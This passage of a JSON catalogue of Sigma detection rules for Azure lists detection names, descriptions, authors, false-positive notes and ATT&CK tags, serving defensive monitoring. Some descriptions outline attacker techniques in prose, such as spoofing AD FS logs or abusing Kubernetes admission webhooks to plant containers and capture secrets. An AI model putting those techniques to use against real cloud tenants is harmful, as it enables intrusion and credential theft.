], "filename": "azure_identity_protection_unfamilar_sign_in.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_unfamilar_sign_in.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "128faeef-79dd-44ca-b43c-a9e236a60f49", "value": "Unfamiliar Sign-In Properties" }, { "description": "Indicates user activity that is unusual for the user or consistent with known attack patterns.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-07", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." 
], "filename": "azure_identity_protection_threat_intel.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in", "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_threat_intel.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a2cb56ff-4f46-437a-a0fa-ffa4d1303cba", "value": "Azure AD Threat Intelligence" }, { "description": "Indicates that the user's valid credentials have been leaked.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "A rare hash collision." 
], "filename": "azure_identity_protection_leaked_credentials.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#leaked-credentials", "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_leaked_credentials.yml" ], "tags": [ "attack.t1589", "attack.reconnaissance" ] }, "related": [ { "dest-uuid": "5282dd9a-d26d-4e16-88b7-7c0f4553daf4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "19128e5e-4743-48dc-bd97-52e5775af817", "value": "Azure AD Account Credential Leaked" }, { "description": "Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "Using an IP address that is shared by many users" ], "filename": "azure_identity_protection_malware_linked_ip.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated", "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malware_linked_ip.yml" ], "tags": [ "attack.t1090", "attack.command-and-control" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "821b4dc3-1295-41e7-b157-39ab212dd6bd", "value": 
"Sign-In From Malware Infected IP" }, { "description": "Detects suspicious rules that delete or move messages or folders are set on a user's inbox.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "Actual mailbox rules that are moving items based on their workflow." ], "filename": "azure_identity_protection_inbox_manipulation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_inbox_manipulation.yml" ], "tags": [ "attack.t1140", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ceb55fd0-726e-4656-bf4e-b585b7f7d572", "value": "Suspicious Inbox Manipulation Rules" }, { "description": "Indicates that a password spray attack has been successfully performed.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." 
], "filename": "azure_identity_protection_password_spray.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#password-spray", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_password_spray.yml" ], "tags": [ "attack.t1110", "attack.credential-access" ] }, "related": [ { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "28ecba0a-c743-4690-ad29-9a8f6f25a6f9", "value": "Password Spray Activity" }, { "description": "Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.", "meta": { "author": "Gloria Lee, '@gleeiamglo'", "creation_date": "2023-08-22", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins" ], "filename": "azure_identity_protection_anonymous_ip_address.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/graph/api/resources/riskdetection?view=graph-rest-1.0", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anonymous-ip-address", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_address.yml" ], "tags": [ "attack.t1528", "attack.credential-access" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53acd925-2003-440d-a1f3-71a5253fe237", "value": "Anonymous IP Address" }, { "description": 
"Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." ], "filename": "azure_identity_protection_atypical_travel.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#atypical-travel", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_atypical_travel.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a41023f-1e70-4026-921a-4d9341a9038e", "value": "Atypical Travel" }, { "description": "Identifies the deletion of Azure Kubernetes Pods.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-07-24", "falsepositive": [ "Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_kubernetes_pods_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_pods_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "b02f9591-12c3-4965-986a-88028629b2e1", "value": "Azure Kubernetes Pods Deleted" }, { "description": "Detects when a Container Registry is created or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-07", "falsepositive": [ "Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_container_registry_created_or_deleted.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_container_registry_created_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "93e0ef48-37c8-49ed-a02c-038aab23628e", "value": "Azure Container Registry Created or Deleted" }, { "description": "Identifies when a service principal is created in Azure.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-02", "falsepositive": [ "Service principal being created may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_service_principal_created.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_service_principal_created.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "0ddcff6d-d262-40b0-804b-80eb592de8e3", "value": "Azure Service Principal Created" }, { "description": "Identifies when ClusterRoles/Roles are being modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-07", "falsepositive": [ "ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_kubernetes_role_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_role_access.yml" ], "tags": [ "attack.impact" ] }, "uuid": "818fee0c-e0ec-4e45-824e-83e4817b0887", "value": "Azure Kubernetes Sensitive Role Access" }, { "description": "Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-07", "falsepositive": [ "Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_kubernetes_secret_or_config_object_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_secret_or_config_object_access.yml" ], "tags": [ "attack.impact" ] }, "uuid": "7ee0b4aa-d8d4-4088-b661-20efdf41a04c", "value": "Azure Kubernetes Secret or Config Object Access" }, { "description": "Identifies when secrets are modified or deleted in Azure.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-16", "falsepositive": [ "Secrets being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_keyvault_secrets_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_keyvault_secrets_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.credential-access", "attack.t1552", "attack.t1552.001" ] }, "related": [ { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b831353c-1971-477b-abb6-2828edc3bca1", "value": "Azure Keyvault Secrets Modified or Deleted" }, { "description": "Identifies when a application is deleted in Azure.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-03", "falsepositive": [ "Application being deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_application_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_application_deleted.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "410d2a41-1e6d-452f-85e5-abdd8257a823", "value": "Azure Application Deleted" }, { "description": "Identifies when a owner is was removed from a application or service principal in Azure.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-03", "falsepositive": [ "Owner being removed may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_owner_removed_from_application_or_service_principal.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_owner_removed_from_application_or_service_principal.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "636e30d5-3736-42ea-96b1-e6e2f8429fd6", "value": "Azure Owner Removed From Application or Service Principal" }, { "description": "Identifies when a device or device configuration in azure is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-03", "falsepositive": [ "Device or device configuration being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_device_or_configuration_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_device_or_configuration_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.t1485", "attack.t1565.001" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "46530378-f9db-4af9-a9e5-889c177d3881", "value": "Azure Device or Configuration Modified or Deleted" }, { "description": "Identifies when a service principal was removed in Azure.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-03", "falsepositive": [ "Service principal being removed may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_service_principal_removed.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_service_principal_removed.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "448fd1ea-2116-4c62-9cde-a92d120e0f08", "value": "Azure Service Principal Removed" }, { "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-26", "falsepositive": [ "If this was approved by System Administrator." ], "filename": "azure_subscription_permissions_elevation_via_activitylogs.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_subscription_permissions_elevation_via_activitylogs.yml" ], "tags": [ "attack.initial-access", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "09438caa-07b1-4870-8405-1dbafe3dad95", "value": "Azure Subscription Permission Elevation Via ActivityLogs" }, { "description": "Identifies when a Virtual Network is modified or deleted in Azure.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "Virtual Network being modified or deleted may be performed by a system 
administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_virtual_network_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_virtual_network_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "bcfcc962-0e4a-4fd9-84bb-a833e672df3f", "value": "Azure Virtual Network Modified or Deleted" }, { "description": "Identifies when a Firewall Rule Configuration is Modified or Deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_network_firewall_rule_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_firewall_rule_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "2a7d64cf-81fa-4daf-ab1b-ab80b789c067", "value": "Azure Firewall Rule Configuration Modified or Deleted" }, { "description": "This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.\nA threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server.\nThis can be done programmatically via HTTP requests to Azure.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-08-26", "falsepositive": [ "Legitimate AD FS servers added to an AAD Health AD FS service instance" ], "filename": "azure_aadhybridhealth_adfs_new_server.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://o365blog.com/post/hybridhealthagent/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_new_server.yml" ], "tags": [ "attack.defense-evasion", "attack.t1578" ] }, "related": [ { "dest-uuid": "144e007b-e638-431d-a894-45d90c54ab90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "288a39fc-4914-4831-9ada-270e9dc12cb4", "value": "Azure Active Directory Hybrid Health AD FS New Server" }, { "description": "Identifies when a VPN connection is modified or deleted.", "meta": { "author": "Austin Songer 
@austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_vpn_connection_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_vpn_connection_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "61171ffc-d79c-4ae5-8e10-9323dba19cd3", "value": "Azure VPN Connection Modified or Deleted" }, { "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", "meta": { "author": "sawwinnnaung", "creation_date": "2020-05-07", "falsepositive": [ "Valid change" ], "filename": "azure_rare_operations.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_rare_operations.yml" ], "tags": [ "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c1182e02-49a3-481c-b3de-0fadc4091488", "value": "Rare Subscription-level Operations In Azure" }, { "description": "Detection for when multi factor authentication has been 
disabled, which might indicate a malicious activity to bypass authentication mechanisms.", "meta": { "author": "@ionsor", "creation_date": "2022-02-08", "falsepositive": [ "Authorized modification by administrators" ], "filename": "azure_mfa_disabled.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_mfa_disabled.yml" ], "tags": [ "attack.persistence", "attack.t1556" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7ea78478-a4f9-42a6-9dcd-f861816122bf", "value": "Disabled MFA to Bypass Authentication Mechanisms" }, { "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", "meta": { "author": "sawwinnnaung", "creation_date": "2020-05-07", "falsepositive": [ "Valid change" ], "filename": "azure_granting_permission_detection.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_granting_permission_detection.yml" ], "tags": [ "attack.persistence", "attack.t1098.003" ] }, "related": [ { "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a622fcd2-4b5a-436a-b8a2-a4171161833c", "value": "Granting Of Permissions To An Account" }, { "description": "User Added to an Administrator's Azure AD 
Role", "meta": { "author": "Raphaël CALVET, @MetallicHack", "creation_date": "2021-10-04", "falsepositive": [ "PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled." ], "filename": "azure_ad_user_added_to_admin_role.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_ad_user_added_to_admin_role.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1098.003", "attack.t1078" ] }, "related": [ { "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ebbeb024-5b1d-4e16-9c0c-917f86c708a7", "value": "User Added to an Administrator's Azure AD Role" }, { "description": "Identifies when an admission controller is executed in Azure Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.\nAn adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other 
sensitive information.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-25", "falsepositive": [ "Azure Kubernetes Admissions Controller may be done by a system administrator.", "If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_kubernetes_admission_controller.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_admission_controller.yml" ], "tags": [ "attack.persistence", "attack.t1078", "attack.credential-access", "attack.t1552", "attack.t1552.007" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f8ef3a62-3f44-40a4-abca-761ab235c436", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a61a3c56-4ce2-4351-a079-88ae4cbd2b58", "value": "Azure Kubernetes Admission Controller" }, { "description": "Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. 
